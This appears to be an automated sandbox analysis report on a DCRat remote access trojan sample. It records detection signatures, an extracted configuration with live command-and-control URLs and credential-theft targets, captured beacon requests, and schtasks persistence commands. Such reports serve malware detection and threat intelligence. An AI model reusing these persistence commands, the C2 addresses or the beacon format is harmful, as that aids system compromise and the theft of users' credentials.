Windows Analysis Report
QT4aLb3P98.exe

Overview

General Information

Sample name: QT4aLb3P98.exe
Renamed because the original name is a hash value
Original sample name: 1a9c19cd373f9ce0642f18f6965521b3.exe
Analysis ID: 1483427
MD5: 1a9c19cd373f9ce0642f18f6965521b3
SHA1: 64bc66f217964ab7310084cc9b2e4ef72ea7156b
SHA256: 82bea7c0254a8a0b675f8702eb3dafbbcc608bdb672738d159b33ae699a4d5bb
Tags: DCRatexe

Detection

DCRat
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected DCRat
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Creates processes via WMI
Drops executables to the windows directory (C:\Windows) and starts them
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Execution from Suspicious Folder
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection

Source: QT4aLb3P98.exe Avira: detected
Source: http://a1009608.xsph.ru/ Avira URL Cloud: Label: malware
Source: http://a1009608.xsph.ru/1132d6f3.php?rgHy1i1qGuabZNE=KZftVioRcmp7cZPF&3f1b5944bfad4eb3eab4f036622470d5=3fcabe54654b82392e895aa4c4e7b395&a9d3e3cdc71e35b96ad20cf4efbd4740=gY3MmNzQjNkhTNzE2M1YWZwAjZ1QTZ0ITO1Y2NmVmY4YDNwEzYjZmM&rgHy1i1qGuabZNE=KZftVioRcmp7cZPF Avira URL Cloud: Label: malware
Source: http://a1009608.xsph.ru Avira URL Cloud: Label: malware
Source: http://a1009608.xsph.ru/@=MjZ2QmMzETM Avira URL Cloud: Label: malware
Source: http://a1009608.xsph.ru/1132d6f3.php?rgHy1i1qGuabZNE=KZftVioRcmp7cZPF&3f1b5944bfad4eb3eab4f036622470 Avira URL Cloud: Label: malware
Source: C:\Program Files\Windows Defender\en-GB\wRRcPdViqk.exe Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Users\user\AppData\Local\Temp\eE9QbXcUOX.bat Avira: detection malicious, Label: BAT/Delbat.C
Source: 00000000.00000002.1688308009.000000001327F000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: DCRat {"SCRT": "{\"o\":\")\",\"L\":\"`\",\"t\":\" \",\"F\":\"_\",\"p\":\"!\",\"A\":\",\",\"w\":\"*\",\"5\":\"#\",\"l\":\"~\",\"H\":\"@\",\"Y\":\"|\",\"I\":\"%\",\"a\":\"<\",\"O\":\".\",\"m\":\";\",\"9\":\"&\",\"h\":\"-\",\"y\":\"^\",\"W\":\">\",\"T\":\"(\",\"i\":\"$\"}", "PCRT": "{\"l\":\"@\",\"V\":\"|\",\"Q\":\".\",\"0\":\"^\",\"X\":\",\",\"U\":\"!\",\"m\":\";\",\"8\":\"-\",\"z\":\"&\",\"B\":\"(\",\"J\":\"`\",\"Y\":\")\",\"1\":\"$\",\"w\":\"%\",\"n\":\"<\",\"d\":\"#\",\"N\":\"*\",\"K\":\"_\",\"h\":\">\",\"S\":\"~\",\"F\":\" \"}", "TAG": "", "MUTEX": "DCR_MUTEX-YA1pCSAA9lv2Umt03noS", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"savebrowsersdatatosinglefile": false, "ignorepartiallyemptydata": false, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": false, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%UsersFolder% - Fast"}, "AS": true, "ASO": false, "AD": false, "H1": "http://a1009608.xsph.ru/@=MjZ2QmMzETM", "H2": "http://a1009608.xsph.ru/@=MjZ2QmMzETM", "T": "0"}
Source: a1009608.xsph.ru Virustotal: Detection: 12%
Source: http://a1009608.xsph.ru Virustotal: Detection: 12%
Source: http://a1009608.xsph.ru/ Virustotal: Detection: 12%
Source: C:\Program Files\Windows Defender\en-GB\wRRcPdViqk.exe ReversingLabs: Detection: 84%
Source: C:\Program Files\Windows Defender\en-GB\wRRcPdViqk.exe Virustotal: Detection: 68%
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe ReversingLabs: Detection: 84%
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Virustotal: Detection: 68%
Source: QT4aLb3P98.exe ReversingLabs: Detection: 84%
Source: QT4aLb3P98.exe Virustotal: Detection: 68%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Program Files\Windows Defender\en-GB\wRRcPdViqk.exe Joe Sandbox ML: detected
Source: QT4aLb3P98.exe Joe Sandbox ML: detected
Source: QT4aLb3P98.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Directory created: C:\Program Files\Windows Defender\en-GB\wRRcPdViqk.exe
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Directory created: C:\Program Files\Windows Defender\en-GB\62cf92e5da7ec3
Source: QT4aLb3P98.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\QT4aLb3P98.exe File opened: C:\Users\user
Source: C:\Users\user\Desktop\QT4aLb3P98.exe File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\Desktop\QT4aLb3P98.exe File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\QT4aLb3P98.exe File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\Desktop\QT4aLb3P98.exe File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\QT4aLb3P98.exe File opened: C:\Users\user\AppData\Local

Networking

Source: Malware configuration extractor URLs: http://a1009608.xsph.ru/@=MjZ2QmMzETM
Source: Joe Sandbox View IP Address: 141.8.192.103
Source: Joe Sandbox View ASN Name: SPRINTHOSTRU
Source: global traffic HTTP traffic detected: GET /1132d6f3.php?rgHy1i1qGuabZNE=KZftVioRcmp7cZPF&3f1b5944bfad4eb3eab4f036622470d5=3fcabe54654b82392e895aa4c4e7b395&a9d3e3cdc71e35b96ad20cf4efbd4740=gY3MmNzQjNkhTNzE2M1YWZwAjZ1QTZ0ITO1Y2NmVmY4YDNwEzYjZmM&rgHy1i1qGuabZNE=KZftVioRcmp7cZPF HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: a1009608.xsph.ruConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /1132d6f3.php?rgHy1i1qGuabZNE=KZftVioRcmp7cZPF&3f1b5944bfad4eb3eab4f036622470d5=3fcabe54654b82392e895aa4c4e7b395&a9d3e3cdc71e35b96ad20cf4efbd4740=gY3MmNzQjNkhTNzE2M1YWZwAjZ1QTZ0ITO1Y2NmVmY4YDNwEzYjZmM&rgHy1i1qGuabZNE=KZftVioRcmp7cZPF HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: a1009608.xsph.ru
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: a1009608.xsph.ru
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Sat, 27 Jul 2024 11:07:02 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-Encoding
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Sat, 27 Jul 2024 11:07:03 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-Encoding
Source: wRRcPdViqk.exe, 0000000B.00000002.1716375349.0000000002639000.00000004.00000800.00020000.00000000.sdmp, wRRcPdViqk.exe, 0000000B.00000002.1716375349.0000000002660000.00000004.00000800.00020000.00000000.sdmp, wRRcPdViqk.exe, 0000000B.00000002.1716375349.000000000268B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a1009608.xsph.ru
Source: wRRcPdViqk.exe, 0000000B.00000002.1716375349.0000000002625000.00000004.00000800.00020000.00000000.sdmp, wRRcPdViqk.exe, 0000000B.00000002.1716375349.0000000002639000.00000004.00000800.00020000.00000000.sdmp, wRRcPdViqk.exe, 0000000B.00000002.1716375349.000000000268B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a1009608.xsph.ru/
Source: wRRcPdViqk.exe, 0000000B.00000002.1716375349.0000000002639000.00000004.00000800.00020000.00000000.sdmp, wRRcPdViqk.exe, 0000000B.00000002.1716375349.000000000268B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a1009608.xsph.ru/1132d6f3.php?rgHy1i1qGuabZNE=KZftVioRcmp7cZPF&3f1b5944bfad4eb3eab4f036622470
Source: QT4aLb3P98.exe, 00000000.00000002.1687936780.000000000344F000.00000004.00000800.00020000.00000000.sdmp, wRRcPdViqk.exe, 0000000B.00000002.1716375349.0000000002639000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: wRRcPdViqk.exe, 0000000B.00000002.1716375349.0000000002660000.00000004.00000800.00020000.00000000.sdmp, wRRcPdViqk.exe, 0000000B.00000002.1716375349.000000000268B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cp.sprinthost.ru
Source: wRRcPdViqk.exe, 0000000B.00000002.1716375349.0000000002660000.00000004.00000800.00020000.00000000.sdmp, wRRcPdViqk.exe, 0000000B.00000002.1716375349.000000000268B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cp.sprinthost.ru/auth/login
Source: wRRcPdViqk.exe, 0000000B.00000002.1716375349.0000000002660000.00000004.00000800.00020000.00000000.sdmp, wRRcPdViqk.exe, 0000000B.00000002.1716375349.000000000268B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://index.from.sh/pages/game.html
Source: C:\Users\user\Desktop\QT4aLb3P98.exe File created: C:\Windows\Media\Sonata\wRRcPdViqk.exe
Source: C:\Users\user\Desktop\QT4aLb3P98.exe File created: C:\Windows\Media\Sonata\wRRcPdViqk.exe\:Zone.Identifier:$DATA
Source: C:\Users\user\Desktop\QT4aLb3P98.exe File created: C:\Windows\Media\Sonata\62cf92e5da7ec3
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Code function: 0_2_00007FFD9B88CC28 0_2_00007FFD9B88CC28
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Code function: 0_2_00007FFD9B88C420 0_2_00007FFD9B88C420
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Code function: 0_2_00007FFD9B894C40 0_2_00007FFD9B894C40
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Code function: 0_2_00007FFD9B8833B0 0_2_00007FFD9B8833B0
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Code function: 0_2_00007FFD9B88C230 0_2_00007FFD9B88C230
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Code function: 0_2_00007FFD9B891090 0_2_00007FFD9B891090
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Code function: 0_2_00007FFD9B88A68D 0_2_00007FFD9B88A68D
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Code function: 0_2_00007FFD9B8935C8 0_2_00007FFD9B8935C8
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Code function: 0_2_00007FFD9B894268 0_2_00007FFD9B894268
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Code function: 0_2_00007FFD9B894100 0_2_00007FFD9B894100
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Code function: 0_2_00007FFD9B889C9F 0_2_00007FFD9B889C9F
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Code function: 10_2_00007FFD9B8B3555 10_2_00007FFD9B8B3555
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Code function: 11_2_00007FFD9B891090 11_2_00007FFD9B891090
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Code function: 11_2_00007FFD9B88C230 11_2_00007FFD9B88C230
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Code function: 11_2_00007FFD9B88A131 11_2_00007FFD9B88A131
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Code function: 11_2_00007FFD9B88A68D 11_2_00007FFD9B88A68D
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Code function: 11_2_00007FFD9B887431 11_2_00007FFD9B887431
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Code function: 11_2_00007FFD9B883555 11_2_00007FFD9B883555
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Code function: 12_2_00007FFD9B8B7431 12_2_00007FFD9B8B7431
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Code function: 12_2_00007FFD9B8B3555 12_2_00007FFD9B8B3555
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Code function: 12_2_00007FFD9B8C1090 12_2_00007FFD9B8C1090
Source: QT4aLb3P98.exe Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: wRRcPdViqk.exe.0.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: wRRcPdViqk.exe0.0.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: QT4aLb3P98.exe, 00000000.00000002.1687778525.0000000001770000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilename( vs QT4aLb3P98.exe
Source: QT4aLb3P98.exe, 00000000.00000002.1687698529.0000000001740000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilename$ vs QT4aLb3P98.exe
Source: QT4aLb3P98.exe, 00000000.00000002.1688308009.000000001363F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename$ vs QT4aLb3P98.exe
Source: QT4aLb3P98.exe, 00000000.00000000.1668798576.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs QT4aLb3P98.exe
Source: QT4aLb3P98.exe, 00000000.00000002.1687312608.000000000154F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exe.MUIj% vs QT4aLb3P98.exe
Source: QT4aLb3P98.exe, 00000000.00000002.1687312608.000000000154F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exej% vs QT4aLb3P98.exe
Source: QT4aLb3P98.exe, 00000000.00000002.1687936780.0000000003315000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename( vs QT4aLb3P98.exe
Source: QT4aLb3P98.exe Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs QT4aLb3P98.exe
Source: QT4aLb3P98.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: QT4aLb3P98.exe, LWnyVJYJI3UvpfiEQ9Z.cs Cryptographic APIs: 'TransformBlock'
Source: QT4aLb3P98.exe, LWnyVJYJI3UvpfiEQ9Z.cs Cryptographic APIs: 'TransformFinalBlock'
Source: QT4aLb3P98.exe, vAvRw3K4pP2OrHcG5JZ.cs Cryptographic APIs: 'CreateDecryptor'
Source: QT4aLb3P98.exe, vAvRw3K4pP2OrHcG5JZ.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.QT4aLb3P98.exe.1740000.1.raw.unpack, -.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.QT4aLb3P98.exe.1363f588.4.raw.unpack, -.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.QT4aLb3P98.exe.1770000.2.raw.unpack, -.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.QT4aLb3P98.exe.331e6c8.3.raw.unpack, -.cs Cryptographic APIs: 'TransformFinalBlock'
Source: classification engine Classification label: mal100.troj.evad.winEXE@16/11@1/1
Source: C:\Users\user\Desktop\QT4aLb3P98.exe File created: C:\Program Files\Windows Defender\en-GB\wRRcPdViqk.exe
Source: C:\Users\user\Desktop\QT4aLb3P98.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\QT4aLb3P98.exe.log
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Mutant created: NULL
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\491eb635c9cefa2a7c4721bdd3f84f9fc3429b6d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5448:120:WilError_03
Source: C:\Users\user\Desktop\QT4aLb3P98.exe File created: C:\Users\user\AppData\Local\Temp\wLOamAKQX5
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\eE9QbXcUOX.bat"
Source: QT4aLb3P98.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: QT4aLb3P98.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%
Source: C:\Users\user\Desktop\QT4aLb3P98.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\QT4aLb3P98.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\QT4aLb3P98.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\QT4aLb3P98.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\QT4aLb3P98.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\QT4aLb3P98.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\QT4aLb3P98.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: QT4aLb3P98.exe ReversingLabs: Detection: 84%
Source: QT4aLb3P98.exe Virustotal: Detection: 68%
Source: C:\Users\user\Desktop\QT4aLb3P98.exe File read: C:\Users\user\Desktop\QT4aLb3P98.exe
Source: unknown Process created: C:\Users\user\Desktop\QT4aLb3P98.exe "C:\Users\user\Desktop\QT4aLb3P98.exe"
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "wRRcPdViqkw" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Defender\en-GB\wRRcPdViqk.exe'" /f
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "wRRcPdViqk" /sc ONLOGON /tr "'C:\Program Files\Windows Defender\en-GB\wRRcPdViqk.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "wRRcPdViqkw" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Defender\en-GB\wRRcPdViqk.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "wRRcPdViqkw" /sc MINUTE /mo 6 /tr "'C:\Windows\Media\Sonata\wRRcPdViqk.exe'" /f
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "wRRcPdViqk" /sc ONLOGON /tr "'C:\Windows\Media\Sonata\wRRcPdViqk.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "wRRcPdViqkw" /sc MINUTE /mo 11 /tr "'C:\Windows\Media\Sonata\wRRcPdViqk.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\eE9QbXcUOX.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: unknown Process created: C:\Windows\Media\Sonata\wRRcPdViqk.exe C:\Windows\Media\Sonata\wRRcPdViqk.exe
Source: unknown Process created: C:\Windows\Media\Sonata\wRRcPdViqk.exe C:\Windows\Media\Sonata\wRRcPdViqk.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\Media\Sonata\wRRcPdViqk.exe "C:\Windows\Media\Sonata\wRRcPdViqk.exe"
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\eE9QbXcUOX.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\Media\Sonata\wRRcPdViqk.exe "C:\Windows\Media\Sonata\wRRcPdViqk.exe"
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Section loaded: dlnashext.dll
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Section loaded: wpdshext.dll
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: netutils.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: ntdsapi.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\w32tm.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\w32tm.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\w32tm.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: cryptsp.dll Jump to behavior
